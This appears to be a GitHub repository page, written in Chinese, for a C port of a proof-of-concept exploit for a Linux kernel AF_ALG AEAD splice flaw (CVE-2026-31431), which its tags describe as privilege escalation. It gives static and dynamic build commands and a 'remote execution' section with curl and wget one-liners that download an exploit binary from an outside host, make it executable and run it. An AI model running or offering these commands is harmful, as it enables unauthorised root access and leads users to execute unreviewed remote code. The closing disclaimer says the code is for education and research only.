offsecguy/CVE-2026-31431
GitHub: offsecguy/CVE-2026-31431
针对 Linux 内核 AF_ALG AEAD splice 逻辑缺陷(CVE-2026-31431)的 C 语言 PoC 利用工具,用于漏洞验证与安全研究。
Stars: 0 | Forks: 0
# copy.fail — AF_ALG AEAD splice 原语 (CVE-2026-31431)
## 概述
本项目是原始 Python 原型(由 *offsecguy* 开发)的 **C 移植版**。
它利用 Linux 内核 crypto API (`AF_ALG`),并使用了以下机制:
- `authencesn(hmac(sha256),cbc(aes))` AEAD 模式
- `MSG_MORE` 标志
- `splice()` 系统调用
该技术将来自 **只读文件描述符** 的数据通过 crypto 套接字进行馈送,并**逐块**进行处理。
## ⚙️ 编译
### 选项 1 — musl(静态构建)
```
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
```
### 选项 2 — GCC 静态
```
gcc exp.c -o exp -lz -s -static
```
### 选项 3 — GCC 动态
```
gcc exp.c -o exp -lz -s
```
## 🚀 远程执行
```
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
```
```
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
```
## ⚠️ 注意事项
- 需要内核支持 `AF_ALG`
- 使用 `zlib` 进行解压缩
- 专为底层内核 crypto 交互与实验而设计
## 免责声明
本代码仅用于**教育和研究目的**。
请负责任地使用,并且仅在您获得授权测试的系统上使用。
标签:AEAD, AF_ALG, CVE-2026-31431, Hpfeeds, Linux内核, musl libc, POC, splice, Web报告查看器, zlib, 代码移植, 协议分析, 客户端加密, 密码学API, 提权, 数据展示, 权限提升, 概念验证, 漏洞分析, 系统调用, 红队, 网络安全, 路径探测, 逻辑漏洞, 隐私保护, 静态编译